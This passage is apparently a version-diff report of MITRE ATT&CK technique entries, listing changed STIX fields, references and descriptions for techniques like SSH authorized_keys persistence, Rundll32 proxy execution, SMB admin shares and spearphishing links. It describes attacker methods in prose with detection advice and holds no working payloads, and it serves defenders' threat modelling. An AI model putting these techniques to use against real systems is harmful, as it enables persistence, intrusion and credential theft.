  external_references[8]['description']: Dan Borges. (2019, July 21). MacOS Red Teaming 206: ARD (Apple Remote Desktop Protocol). Retrieved September 10, 2021. → SSH.COM. (n.d.). SSH (Secure Shell). Retrieved March 23, 2020.
  external_references[8]['url']: http://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.html → https://www.ssh.com/ssh
  x_mitre_data_sources[1]: Module: Module Load → Logon Session: Logon Session Creation
  x_mitre_data_sources[2]: Network Traffic: Network Connection Creation → Network Share: Network Share Access
  x_mitre_data_sources[3]: Network Traffic: Network Traffic Flow → Command: Command Execution
  x_mitre_data_sources[4]: Command: Command Execution → Module: Module Load
  x_mitre_data_sources[5]: Logon Session: Logon Session Creation → Network Traffic: Network Connection Creation
  x_mitre_data_sources[6]: Network Share: Network Share Access → Network Traffic: Network Traffic Flow
  x_mitre_version: 1.2 → 1.3

iterable_item_removed
  external_references: {'source_name': 'Apple Unified Log Analysis Remote Login and Screen Sharing', 'description': 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.', 'url': 'https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins'}

[T1036.003] Masquerading: Rename System Utilities

Current version: 1.1

Version changed from: 1.0 → 1.1

Details

dictionary_item_added
  x_mitre_attack_spec_version: 3.1.0
  x_mitre_deprecated: False

values_changed
STIX Field: Old value → New Value
  modified: 2020-11-23 17:03:38.941000+00:00 → 2023-04-07 17:07:20.038000+00:00
  external_references[1]['source_name']: LOLBAS Main Site → Twitter ItsReallyNick Masquerading Update
  external_references[1]['description']: LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020. → Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019.
  external_references[1]['url']: https://lolbas-project.github.io/ → https://twitter.com/ItsReallyNick/status/1055321652777619457
  external_references[4]['source_name']: Twitter ItsReallyNick Masquerading Update → LOLBAS Main Site
  external_references[4]['description']: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019. → LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020.
  external_references[4]['url']: https://twitter.com/ItsReallyNick/status/1055321652777619457 → https://lolbas-project.github.io/
  x_mitre_data_sources[0]: Process: Process Metadata → File: File Metadata
  x_mitre_data_sources[1]: File: File Modification → Command: Command Execution
  x_mitre_data_sources[2]: Command: Command Execution → Process: Process Metadata
  x_mitre_data_sources[3]: File: File Metadata → File: File Modification
  x_mitre_version: 1.0 → 1.1

[T1218.011] System Binary Proxy Execution: Rundll32

Current version: 2.1

Version changed from: 2.0 → 2.1

Details

values_changed
STIX Field: Old value → New Value
  modified: 2022-04-19 18:12:39.357000+00:00 → 2023-04-21 12:25:32.096000+00:00
  x_mitre_attack_spec_version: 2.1.0 → 3.1.0
  x_mitre_data_sources[0]: Process: Process Creation → Module: Module Load
  x_mitre_data_sources[1]: File: File Metadata → Command: Command Execution
  x_mitre_data_sources[2]: Command: Command Execution → File: File Metadata
  x_mitre_data_sources[3]: Module: Module Load → Process: Process Creation
  x_mitre_version: 2.0 → 2.1

[T1021.002] Remote Services: SMB/Windows Admin Shares

Current version: 1.1

Version changed from: 1.0 → 1.1

Details

dictionary_item_added
  x_mitre_attack_spec_version: 3.1.0
  x_mitre_deprecated: False
  external_references: French, D. (2018, October 9). Detecting & Removing an Attacker’s WMI Persistence. Retrieved October 11, 2019.

dictionary_item_removed
  x_mitre_permissions_required: ['User', 'Administrator']
  external_references: CAPEC-561

values_changed
STIX Field: Old value → New Value
  modified: 2020-03-23 21:16:02.812000+00:00 → 2023-04-03 18:57:59.554000+00:00
  external_references[1]['source_name']: capec → Medium Detecting WMI Persistence
  external_references[1]['url']: https://capec.mitre.org/data/definitions/561.html → https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96
  external_references[2]['source_name']: Wikipedia Server Message Block → TechNet RPC
  external_references[2]['description']: Wikipedia. (2017, December 16). Server Message Block. Retrieved December 21, 2017. → Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016.
  external_references[2]['url']: https://en.wikipedia.org/wiki/Server_Message_Block → https://technet.microsoft.com/en-us/library/cc787851.aspx
  external_references[3]['source_name']: TechNet RPC → Microsoft Admin Shares
  external_references[3]['description']: Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016. → Microsoft. (n.d.). How to create and delete hidden or administrative shares on client computers. Retrieved November 20, 2014.
  external_references[3]['url']: https://technet.microsoft.com/en-us/library/cc787851.aspx → http://support.microsoft.com/kb/314984
  external_references[4]['source_name']: Microsoft Admin Shares → Windows Event Forwarding Payne
  external_references[4]['description']: Microsoft. (n.d.). How to create and delete hidden or administrative shares on client computers. Retrieved November 20, 2014. → Payne, J. (2015, November 23). Monitoring what matters - Windows Event Forwarding for everyone (even if you already have a SIEM.). Retrieved February 1, 2016.
  external_references[4]['url']: http://support.microsoft.com/kb/314984 → https://docs.microsoft.com/en-us/archive/blogs/jepayne/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem
  external_references[6]['source_name']: Windows Event Forwarding Payne → Wikipedia Server Message Block
  external_references[6]['description']: Payne, J. (2015, November 23). Monitoring what matters - Windows Event Forwarding for everyone (even if you already have a SIEM.). Retrieved February 1, 2016. → Wikipedia. (2017, December 16). Server Message Block. Retrieved December 21, 2017.
  external_references[6]['url']: https://docs.microsoft.com/en-us/archive/blogs/jepayne/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem → https://en.wikipedia.org/wiki/Server_Message_Block
  x_mitre_data_sources[1]: Network Traffic: Network Traffic Flow → Logon Session: Logon Session Creation
  x_mitre_data_sources[2]: Logon Session: Logon Session Creation → Network Share: Network Share Access
  x_mitre_data_sources[4]: Network Share: Network Share Access → Network Traffic: Network Traffic Flow
  x_mitre_version: 1.0 → 1.1

iterable_item_removed
  external_references: {'source_name': 'Medium Detecting WMI Persistence', 'description': 'French, D. (2018, October 9). Detecting & Removing an Attacker’s WMI Persistence. Retrieved October 11, 2019.', 'url': 'https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96'}

[T1098.004] Account Manipulation: SSH Authorized Keys

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may modify the SSH <code>authorized_keys</code> t1Adversaries may modify the SSH <code>authorized_keys</code> 
>file to maintain persistence on a victim host. Linux distrib>file to maintain persistence on a victim host. Linux distrib
>utions and macOS commonly use key-based authentication to se>utions and macOS commonly use key-based authentication to se
>cure the authentication process of SSH sessions for remote m>cure the authentication process of SSH sessions for remote m
>anagement. The <code>authorized_keys</code> file in SSH spec>anagement. The <code>authorized_keys</code> file in SSH spec
>ifies the SSH keys that can be used for logging into the use>ifies the SSH keys that can be used for logging into the use
>r account for which the file is configured. This file is usu>r account for which the file is configured. This file is usu
>ally found in the user's home directory under <code>&lt;user>ally found in the user's home directory under <code>&lt;user
Old Description (continued):
…<user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.

Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm)

Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user.

New Description (continued):
…<user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.

Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm)

Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user.

SSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) command.(Citation: cisco_ip_ssh_pubkey_ch_cmd)
Details

values_changed
STIX Field | Old value | New value
modified | 2022-04-20 16:26:57.982000+00:00 | 2023-04-12 23:28:34.599000+00:00
description | Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config. Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. | Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config. Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. SSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) command.(Citation: cisco_ip_ssh_pubkey_ch_cmd)
external_references[3]['source_name'] | Cybereason Linux Exim Worm | cisco_ip_ssh_pubkey_ch_cmd
external_references[3]['description'] | Cybereason Nocturnus. (2019, June 13). New Pervasive Worm Exploiting Linux Exim Server Vulnerability. Retrieved June 24, 2020. | Cisco. (2021, August 23). ip ssh pubkey-chain. Retrieved July 13, 2022.
external_references[3]['url'] | https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability | https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/d1/sec-d1-cr-book/sec-cr-i3.html#wp1254331478
external_references[4]['source_name'] | Google Cloud Add Metadata | Cybereason Linux Exim Worm
external_references[4]['description'] | Google Cloud. (2022, March 31). gcloud compute instances add-metadata. Retrieved April 1, 2022. | Cybereason Nocturnus. (2019, June 13). New Pervasive Worm Exploiting Linux Exim Server Vulnerability. Retrieved June 24, 2020.
external_references[4]['url'] | https://cloud.google.com/sdk/gcloud/reference/compute/instances/add-metadata | https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability
external_references[5]['source_name'] | Azure Update Virtual Machines | Google Cloud Add Metadata
external_references[5]['description'] | Microsoft. (n.d.). Virtual Machines - Update. Retrieved April 1, 2022. | Google Cloud. (2022, March 31). gcloud compute instances add-metadata. Retrieved April 1, 2022.
external_references[5]['url'] | https://docs.microsoft.com/en-us/rest/api/compute/virtual-machines/update | https://cloud.google.com/sdk/gcloud/reference/compute/instances/add-metadata
external_references[6]['source_name'] | SSH Authorized Keys | Azure Update Virtual Machines
external_references[6]['description'] | ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June 24, 2020. | Microsoft. (n.d.). Virtual Machines - Update. Retrieved April 1, 2022.
external_references[6]['url'] | https://www.ssh.com/ssh/authorized_keys/ | https://docs.microsoft.com/en-us/rest/api/compute/virtual-machines/update
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_detection | Use file integrity monitoring to detect changes made to the authorized_keys file for each user on a system. Monitor for suspicious processes modifying the authorized_keys file. In cloud environments, monitor instances for modification of metadata and configurations. Monitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config. | Use file integrity monitoring to detect changes made to the authorized_keys file for each user on a system. Monitor for suspicious processes modifying the authorized_keys file. In cloud environments, monitor instances for modification of metadata and configurations. Monitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config. For network infrastructure devices, collect AAA logging to monitor for rogue SSH keys being added to accounts.
x_mitre_version | 1.1 | 1.2

iterable_item_added
STIX Field | Old value | New value
external_references |  | {'source_name': 'SSH Authorized Keys', 'description': 'ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June 24, 2020.', 'url': 'https://www.ssh.com/ssh/authorized_keys/'}
x_mitre_contributors |  | Austin Clark, @c2defense
x_mitre_data_sources |  | File: File Modification
x_mitre_platforms |  | Network

iterable_item_removed
STIX Field | Old value | New value
x_mitre_data_sources | File: File Modification | 

[T1053.005] Scheduled Task/Job: Scheduled Task

Current version: 1.3

Version changed from: 1.2 → 1.3

Details

values_changed
STIX Field | Old value | New value
modified | 2022-07-06 20:20:13.871000+00:00 | 2023-04-07 17:11:17.807000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[0] | Scheduled Job: Scheduled Job Creation | File: File Modification
x_mitre_data_sources[1] | Windows Registry: Windows Registry Key Creation | Scheduled Job: Scheduled Job Creation
x_mitre_data_sources[2] | Command: Command Execution | Process: Process Creation
x_mitre_data_sources[3] | Process: Process Creation | Command: Command Execution
x_mitre_data_sources[4] | File: File Modification | Windows Registry: Windows Registry Key Creation
x_mitre_version | 1.2 | 1.3

[T1546.002] Event Triggered Execution: Screensaver

Current version: 1.1

Version changed from: 1.0 → 1.1

Details

values_changed
STIX Field | Old value | New value
modified | 2022-04-20 16:58:48.140000+00:00 | 2023-04-21 12:31:54.177000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[1] | File: File Modification | Command: Command Execution
x_mitre_data_sources[2] | File: File Creation | Process: Process Creation
x_mitre_data_sources[3] | Command: Command Execution | File: File Modification
x_mitre_data_sources[4] | Process: Process Creation | File: File Creation
x_mitre_version | 1.0 | 1.1

[T1518.001] Software Discovery: Security Software Discovery

Current version: 1.4

Version changed from: 1.3 → 1.4

Details

values_changed
STIX Field | Old value | New value
modified | 2022-04-11 22:26:34.327000+00:00 | 2023-04-21 12:30:00.939000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[2] | Process: Process Creation | Firewall: Firewall Metadata
x_mitre_data_sources[4] | Firewall: Firewall Metadata | Process: Process Creation
x_mitre_version | 1.3 | 1.4

iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/581.html', 'external_id': 'CAPEC-581'} | 

[T1584.004] Compromise Infrastructure: Server

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description:
Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.

Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).

New Description:
Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.

Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations.
Details

dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version |  | 3.1.0
x_mitre_contributors |  | ['Dor Edry, Microsoft']
x_mitre_deprecated |  | False

values_changed
STIX Field | Old value | New value
modified | 2021-10-17 16:00:16.273000+00:00 | 2023-04-13 00:00:25.676000+00:00
description | Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations. Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). | Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations. Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations.
external_references[1]['source_name'] | ThreatConnect Infrastructure Dec 2020 | Koczwara Beacon Hunting Sep 2021
external_references[1]['description'] | ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021. | Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.
external_references[1]['url'] | https://threatconnect.com/blog/infrastructure-research-hunting/ | https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
external_references[3]['source_name'] | Koczwara Beacon Hunting Sep 2021 | ThreatConnect Infrastructure Dec 2020
external_references[3]['description'] | Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021. | ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.
external_references[3]['url'] | https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2 | https://threatconnect.com/blog/infrastructure-research-hunting/
x_mitre_data_sources[0] | Internet Scan: Response Metadata | Internet Scan: Response Content
x_mitre_data_sources[1] | Internet Scan: Response Content | Internet Scan: Response Metadata
x_mitre_version | 1.1 | 1.2

[T1583.004] Acquire Infrastructure: Server

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description:
Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.

Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)

New Description:
Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Adversaries may use web servers to support support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.

Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)
Details

dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version |  | 3.1.0
x_mitre_contributors |  | ['Dor Edry, Microsoft']
x_mitre_deprecated |  | False

values_changed
STIX Field | Old value | New value
modified | 2021-10-17 15:39:45.736000+00:00 | 2023-04-12 20:18:42.003000+00:00
description | Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations. Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet) | Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Adversaries may use web servers to support support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations. Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)
external_references[1]['source_name'] | NYTStuxnet | Koczwara Beacon Hunting Sep 2021
external_references[1]['description'] | William J. Broad, John Markoff, and David E. Sanger. (2011, January 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved March 1, 2017. | Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.
external_references[1]['url'] | https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html | https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
external_references[2]['source_name'] | ThreatConnect Infrastructure Dec 2020 | Mandiant SCANdalous Jul 2020
external_references[2]['description'] | ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021. | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.
external_references[2]['url'] | https://threatconnect.com/blog/infrastructure-research-hunting/ | https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
external_references[3]['source_name'] | Mandiant SCANdalous Jul 2020 | ThreatConnect Infrastructure Dec 2020
external_references[3]['description'] | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021. | ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.
external_references[3]['url'] | https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation | https://threatconnect.com/blog/infrastructure-research-hunting/
external_references[4]['source_name'] | Koczwara Beacon Hunting Sep 2021 | NYTStuxnet
external_references[4]['description'] | Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021. | William J. Broad, John Markoff, and David E. Sanger. (2011, January 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved March 1, 2017.
external_references[4]['url'] | https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2 | https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html
x_mitre_data_sources[0] | Internet Scan: Response Metadata | Internet Scan: Response Content
x_mitre_data_sources[1] | Internet Scan: Response Content | Internet Scan: Response Metadata
x_mitre_version | 1.1 | 1.2

[T1598.003] Phishing for Information: Spearphishing Link

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description:
Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site.

From the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.

New Description:
Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site.

Adversaries may also link to "web bugs" or "web beacons" within phishing messages to verify the receipt of an email, while also potentially profiling and tracking victim information such as IP address.(Citation: NIST Web Bug)

Adversaries may also be able to spoof a complete website using what is known as a "browser-in-the-browser" (BitB) attack. By generating a fake browser popup window with an HTML-based address bar that appears to contain a legitimate URL (such as an authentication portal), they may be able to prompt users to enter their credentials while bypassing typical URL verification methods.(Citation: ZScaler BitB 2020)(Citation: Mr. D0x BitB 2022)

From the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.
Details

values_changed
STIX Field | Old value | New value
modified | 2022-10-21 16:01:47.611000+00:00 | 2023-04-15 17:38:48.406000+00:00
description | Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. | Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of spearphishing are electronically delivered social engineering 